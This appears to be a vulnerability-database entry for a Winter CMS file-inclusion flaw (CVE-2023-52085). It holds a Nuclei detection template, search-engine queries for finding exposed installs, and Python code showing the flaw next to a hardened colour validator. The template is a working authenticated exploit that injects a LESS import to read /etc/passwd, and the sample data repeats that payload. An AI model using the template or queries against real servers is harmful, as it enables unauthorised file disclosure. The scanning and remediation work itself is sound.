NUCLEI:CVE-2023-52085 (nuclei, ProjectDiscovery)
History: Feb 02, 2024 - 10:08 a.m.

Winter CMS Local File Inclusion - (LFI)

2024-02-02 10:08:58
ProjectDiscovery
github.com
Tags: cve2023, authenticated, wintercms, colorpicker, fileinclusion

CVSS3: 5.4 Medium (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N)
  Attack Vector: NETWORK
  Attack Complexity: LOW
  Privileges Required: LOW
  User Interaction: NONE
  Scope: UNCHANGED
  Confidentiality Impact: LOW
  Integrity Impact: LOW
  Availability Impact: NONE

AI Score: 4.4 Medium (Confidence: High)

EPSS: 0.003 Low (Percentile: 67.9%)

Winter is a free, open-source content management system. Users with access to backend forms that include a ColorPicker FormWidget can provide a value that would then be included without further processing in the compilation of custom stylesheets via LESS. This had the potential to lead to a Local File Inclusion vulnerability. This issue has been patched in v1.2.4.

Nuclei template:

id: CVE-2023-52085

info:
  name: Winter CMS Local File Inclusion - (LFI)
  author: sanineng
  severity: medium
  description: |
    Winter is a free, open-source content management system. Users with access to backend forms that include a ColorPicker FormWidget can provide a value that would then be included without further processing in the compilation of custom stylesheets via LESS. This had the potential to lead to a Local File Inclusion vulnerability. This issue has been patched in v1.2.4.
  reference:
    - https://github.com/wintercms/winter/security/advisories/GHSA-2x7r-93ww-cxrq
    - https://nvd.nist.gov/vuln/detail/CVE-2023-52085
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2023-52085
    cwe-id: CWE-22
    epss-score: 0.00256
    epss-percentile: 0.65415
    cpe: cpe:2.3:a:wintercms:winter:*:*:*:*:*:*:*:*
  metadata:
    max-request: 4
    vendor: wintercms
    product: winter
    shodan-query:
      - "title:\"Winter CMS\""
      - http.title:"winter cms"
    fofa-query:
      - "title=\"Winter CMS\""
      - title="winter cms"
    google-query: intitle:"winter cms"
  tags: cve,cve2023,authenticated,lfi,wintercms

http:
  - raw:
      - |
        GET /backend/backend/auth/signin HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /backend/backend/auth/signin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _token={{_token}}&postback=1&login={{username}}&password={{password}}

      - |
        POST /backend/system/mailbrandsettings HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-WINTER-REQUEST-HANDLER: onSave
        X-WINTER-REQUEST-PARTIALS:
        X-Requested-With: XMLHttpRequest

        _token={{_token}}&MailBrandSetting%5Bbody_bg%5D=%2342445B;@import%20(inline)%20%22/etc/passwd%22&redirect=0

      - |
        GET /backend/system/mailbrandsettings HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 3

    matchers:
      - type: regex
        part: body_4
        regex:
          - "root:[x*]:0:0:"

    extractors:
      - type: regex
        part: body
        name: _token
        group: 1
        regex:
          - '<input name="_token" type="hidden" value="([0-9a-zA-Z]{40})">'
        internal: true
# digest: 490a0046304402200e104a483850d66787d611030336f222ee3d4972ef37c8039c12a483b4e5b2a60220155396fef3818a7af539443ef744dfc91bb98446c28034964a036156915641d5:922c64590222798bb761d5b6d8e72950
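The root cause described above is a form value that is dropped verbatim into LESS source, where a LESS `@import (inline)` directive can pull an arbitrary file into the compiled stylesheet. The following Python example is added here as an illustration and is not Winter CMS code; it shows the pre-fix pattern (raw interpolation) next to a hardened builder that only accepts a strict `#RGB`/`#RRGGBB` hex colour, plus a second-layer check that refuses to compile any generated LESS containing an `@import`. The stylesheet template, the hex whitelist and the sample values (the tampered value is the URL-decoded `MailBrandSetting[body_bg]` from the template above) are all constructed for this example; Winter's actual post-v1.2.4 validation is not reproduced.

```python
import re

# Assumed whitelist: a CSS hex colour, "#RGB" or "#RRGGBB". A colour picker
# widget never needs to emit anything else, so everything else is rejected.
HEX_COLOUR_RE = re.compile(r"^#(?:[0-9a-fA-F]{3}|[0-9a-fA-F]{6})$")

# Constructed stand-in for a custom LESS stylesheet that embeds the form value.
LESS_TEMPLATE = "@body-bg: {body_bg};\nbody {{ background: @body-bg; }}\n"

# Any @import in generated LESS is a sign the value was not a plain colour.
IMPORT_RE = re.compile(r"@import\b", re.IGNORECASE)


def build_less_unsafe(body_bg: str) -> str:
    """Pre-fix pattern: the submitted value is interpolated without processing."""
    return LESS_TEMPLATE.format(body_bg=body_bg)


def validate_colour(value: str) -> str:
    """Accept only a strict hex colour; anything else raises ValueError."""
    if not HEX_COLOUR_RE.fullmatch(value):
        raise ValueError(f"not a hex colour: {value!r}")
    return value


def build_less_safe(body_bg: str) -> str:
    """Hardened builder: validate the value before it reaches the LESS source."""
    return LESS_TEMPLATE.format(body_bg=validate_colour(body_bg))


def stylesheet_has_import(less_source: str) -> bool:
    """Second-layer check to run on generated LESS before handing it to the compiler."""
    return IMPORT_RE.search(less_source) is not None


def is_rejected(value: str) -> bool:
    """True if the hardened builder refuses the value."""
    try:
        build_less_safe(value)
    except ValueError:
        return True
    return False


# Constructed sample inputs: a normal colour, and the tampered form value
# (URL-decoded) that the nuclei template above submits.
GOOD_VALUE = "#42445B"
TAMPERED_VALUE = '#42445B;@import (inline) "/etc/passwd"'

if __name__ == "__main__":
    print("unsafe build contains @import:",
          stylesheet_has_import(build_less_unsafe(TAMPERED_VALUE)))
    print("hardened build rejects tampered value:", is_rejected(TAMPERED_VALUE))
    print(build_less_safe(GOOD_VALUE))
```

The whitelist is deliberately narrower than full CSS colour syntax (no named colours or `rgb()`), which is the right trade-off for a picker widget: the fix is to validate at the form boundary, and the `@import` scan on the generated source only catches the case where validation was bypassed elsewhere.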
